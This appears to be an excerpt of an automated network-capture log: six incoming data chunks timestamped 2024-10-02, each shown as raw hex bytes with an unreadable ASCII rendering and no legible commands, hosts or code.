2024-10-02 04:28:24 UTC	4096	IN	Data Raw: 96 e1 54 67 6f 44 81 74 f8 4b 9c 69 8c 17 e3 1f f8 37 90 9d 80 15 e8 09 2d d4 51 af ba c1 6f 4f 26 72 37 44 f2 b2 8e 4a 9f 5f 4d b9 4d 47 e5 ab bc 7f c5 d7 f7 dc 8d e7 81 fe 9e 20 4b 3d 3a 7c 83 6d ae 34 bf 29 a1 69 51 e5 be 9e 5b e0 00 79 d8 63 8b 90 47 c0 7f 3a ab 1e 54 0d ba 67 21 dc e2 05 4e 93 17 3e 01 96 fb 78 f6 49 72 c0 d9 11 59 fe 7c e6 94 44 1f cf 22 ca d3 a7 03 e6 18 ca ac 54 c6 fa 61 2c 29 26 2e 35 dc 3e 38 30 4b 5f 28 7f 5c ed b2 7b 46 69 ed de 2e f7 b4 f6 9c 5b 1c ba ea ee 7d 81 20 77 05 b5 4b 7b bf 76 6f 97 0f be df 75 03 b5 01 ac 5c 6b 04 2b 05 56 b1 de c6 5d f2 cd 69 76 83 36 c2 67 a0 be 21 f8 0f 51 ce 6b 3f 9c bb 91 7a 92 1e ec 3b e3 01 a4 e7 c6 e9 e6 dd 98 ce 97 6c 46 d8 f7 91 b5 b4 c2 46 78 cb 3a c9 73 4b 2e f2 eb e3 0a a0 72 38 6f c3 Data Ascii: TgoDtKi7-QoO&r7DJ_MMG K=:\|m4)iQ[ycG:Tg!N>xIrY\|D"Ta,)&.5>80K_(\{Fi.[} wK{vou\k+V]iv6g!Qk?z;lFFx:sK.r8o
2024-10-02 04:28:24 UTC	2044	IN	Data Raw: 08 9f f4 8a 13 2d 32 32 c6 7c 72 f5 0d 79 b0 a1 ad 75 1a d3 c4 d3 e9 8c 6e 92 eb 5c e7 c5 e9 b7 13 3b 04 29 53 2b d3 be b4 72 7e 1d ff e6 d4 3f e9 14 e7 c9 21 c1 7f 61 b8 ae 2a 9b c0 aa f2 eb ab 5a c5 49 37 fb a1 69 29 36 ae 8d 78 a5 87 b2 9b 7b f9 69 6d 97 4e 92 4f 98 32 51 a2 48 71 29 43 38 5a 2e 00 82 9a 2f e2 3d 03 71 71 76 18 b8 2c e2 96 ee d2 23 04 8c 89 2f c8 8e 68 df f2 ab af cf bc df 7a be 4f 7e 75 a6 4c 80 44 f2 c9 f8 4f fc 2c f1 27 01 61 dc e2 23 f0 2e c5 a4 3e 46 1c 68 49 48 eb fa a9 fa f6 1a c0 7b 46 fc 09 60 4b 3e 1d 97 24 f9 a6 4f 4e 7d b1 cb 16 da 58 2b 46 80 fd bc f9 09 04 6b dd b0 f9 3d 98 59 13 a5 b3 6b 02 fb 67 9f f8 1b 00 86 7c 5a b2 59 3f 51 2f 16 69 2e 34 f1 fd 7e 42 74 25 17 d7 73 82 0d 74 71 70 8a 51 58 17 a5 0c df ba 38 dd 57 d8 Data Ascii: -22\|ryun\;)S+r~?!a*ZI7i)6x{imNO2QHq)C8Z./=qqv,#/hzO~uLDO,'a#.>FhIH{F`K>$ON}X+Fk=Ykg\|ZY?Q/i.4~Bt%stqpQX8W
2024-10-02 04:28:24 UTC	4096	IN	Data Raw: 35 38 30 30 0d 0a 9d 31 fc 42 2b 3e 7f c1 4d 6d b1 21 39 ae 03 cd 60 51 5b fa a1 d0 b6 df 6a 6e b2 8b 36 19 5d 17 a2 47 65 3e 83 48 0e 1b be 33 c8 56 c5 68 e2 9e 90 0f 48 cf c6 3a dd 8c 27 7c 28 af 93 c3 0a ce 07 92 c4 29 de aa 56 c9 f3 30 ec 61 70 eb 2b 0e 05 89 cc 87 7a a9 8a 19 b3 88 d6 cb fa 35 ab 97 0d 6a b6 3a 28 b5 e9 df 9b f1 9e 83 d7 1d 2c cf 7d 23 04 73 0c 99 f5 b7 0c cb 1a 35 59 d9 c3 c0 12 41 b2 34 25 e6 9a 84 ac f9 0f e0 8d 9d f4 b0 f3 4c 5d 1b 8a 20 35 16 74 a0 74 ac dc 1c 9d f1 de ea 0e 58 dd b1 33 97 2c da 10 01 00 58 12 e6 ca c2 51 b7 e3 8f 63 45 7e b9 68 75 04 a6 6c c0 87 1e d9 55 ca 22 40 46 10 2b b8 8f 4a 63 71 74 0e b5 6b 04 92 69 06 c0 68 42 67 82 83 7e e1 43 0a b7 35 8b 61 34 8d 8e ed 23 30 0a 29 a5 03 72 7c 49 4e b5 15 47 8c 5a 3c Data Ascii: 58001B+>Mm!9`Q[jn6]Ge>H3VhH:'\|()V0ap+z5j:(,}#s5YA4%L] 5ttX3,XQcE~hulU"@F+JcqtkihBg~C5a4#0)r\|INGZ<
2024-10-02 04:28:24 UTC	4096	IN	Data Raw: 5d 1d 9f 91 a7 a6 4b 6a 45 ac 48 ba 36 fd d3 5d b1 27 97 2a 12 45 de 77 d2 65 0d d2 77 47 cf 5e 90 4b 9f 71 ab 10 ac c7 a8 7a 48 8a cb 15 89 40 d2 1c a5 77 3a 5d f6 85 19 8a 42 1e 31 3a 37 33 09 77 6e 3a a6 5b 4a f9 74 b7 18 d7 99 c4 0b be 6b 27 61 16 65 5a c6 07 fe 32 c1 b0 d9 99 8e 14 67 78 07 d3 42 a7 0e b3 f2 4a b5 ca 8c a2 22 c0 33 23 38 4c eb d2 5d 3c 30 3b c7 64 9d b9 15 6d dd 3e 01 f8 e5 4e 0f 7d a7 ff 06 96 e0 e2 ff 6d bf 87 7c de f0 2c 7f fc 58 b4 ef e8 19 56 28 fd 6a c6 b5 09 b3 9c bb 9a f0 79 fe f4 45 e7 ea f8 3c 3f 81 8f a5 78 1b 3c 90 04 1e 6f 47 f8 22 4c 98 be 68 6a b4 5d 40 8b 98 b1 f3 d2 59 d7 f4 18 da 3b 6c b7 64 67 17 98 dd b2 5b e5 ba 5f 88 55 38 d2 88 d0 0f ba 46 f0 c8 a9 6d c3 39 42 2c 10 08 19 52 cd fe b1 37 ff 37 8b b5 67 49 2b 82 Data Ascii: ]KjEH6]'*EwewG^KqzH@w:]B1:73wn:[Jtk'aeZ2gxBJ"3#8L]<0;dm>N}m\|,XV(jyE<?x<oG"Lhj]@Y;ldg[_U8Fm9B,R77gI+
2024-10-02 04:28:24 UTC	4096	IN	Data Raw: 4c 86 17 1a 61 32 26 06 dd fb fb df e2 5e 49 7d 1a d3 65 90 81 84 dc ac 56 34 83 3f 5e 34 c3 c6 34 47 f7 4e 6a cc ec 09 bc 61 40 43 ae 30 59 40 d7 82 ae 44 3d 76 b6 54 07 e3 4e d3 f1 a2 45 de 2b 44 9d 6a 3d 14 00 84 06 42 6f 38 a8 2a ff 21 6c 41 cf dc 7c 44 8e c3 4e 49 c4 b4 fe 7c 43 00 69 5a b6 cf e5 a3 87 df fc 95 d5 b6 69 81 af e9 90 2a 18 29 18 ba 4d ee 34 a7 ea 88 0e e8 5e e9 22 d6 25 85 f5 19 cb c0 46 b8 ff a3 bf 03 5f 87 80 35 d8 8c 6d 2e ff 81 1a 24 c9 31 c0 63 86 4f 3e e7 0a 68 70 2f d1 f9 99 54 f4 e5 3c 89 41 2c 45 47 ad 4c 26 12 8c 9c 16 59 4c fe 58 cb af 15 08 b1 0f 48 a1 46 e9 00 0c 22 a0 15 0e 51 a7 7e 87 e1 79 11 9e e2 cb 90 f6 d6 ba f1 f8 08 ba 49 d4 8f 57 ec 37 af d8 df 10 8e bc a6 0f f7 a4 13 0f 03 54 46 d9 39 e5 7d ac 3c cc 16 0c 8c 82 Data Ascii: La2&^I}eV4?^44GNja@C0Y@D=vTNE+Dj=Bo8!lA\|DNI\|CiZi)M4^"%F_5m.$1cO>hp/T<A,EGL&YLXHF"Q~yIW7TF9}<
2024-10-02 04:28:24 UTC	4096	IN	Data Raw: ba 65 1d 7f de 83 57 b1 0b 16 31 2e 40 be e8 e2 4f b5 5f b4 b5 66 5a f3 69 73 c7 97 e1 82 65 38 d7 4a b2 0e a0 9d e6 0e 63 e7 12 06 29 0e 37 41 82 66 f7 9e 7e 34 78 5a 1e d8 2c d5 6c 09 62 52 3b 66 45 bb dd d4 ce c0 b2 d6 1d 53 b1 36 2f bc 0d 5b 91 14 38 9c 06 58 61 18 ae e0 c3 15 b1 8b 74 e6 e2 cf 51 b4 33 68 47 39 87 97 56 3a 46 87 83 fc 50 fa 6d e7 6d fd c3 56 42 69 ba 1b 45 2a b4 51 f0 b1 d5 a7 ec 59 64 02 8e 2e 69 58 3d 63 c5 8c f3 83 ad 99 8e 86 8b 26 8a 96 fb 0f aa 22 e8 42 c5 22 d4 c6 46 49 bc b1 32 89 30 02 05 83 90 0e 2c 88 21 8b 9e 19 58 de 51 20 7e dd 9a e4 f6 44 76 e7 4b df 50 9d e9 fa 37 5c 40 42 44 89 e1 3f fa 12 ca 69 02 9b a4 5b 5a e0 c6 85 a4 20 0b 04 4c ed 1c ef e5 6a 14 a1 42 52 36 43 40 c6 8c 62 a8 68 e7 8b 76 e4 01 9e ce a0 dd 7e 98 Data Ascii: eW1.@O_fZise8Jc)7Af~4xZ,lbR;fES6/[8XatQ3hG9V:FPmmVBiE*QYd.iX=c&"B"FI20,!XQ ~DvKP7\@BD?i[Z LjBR6C@bhv~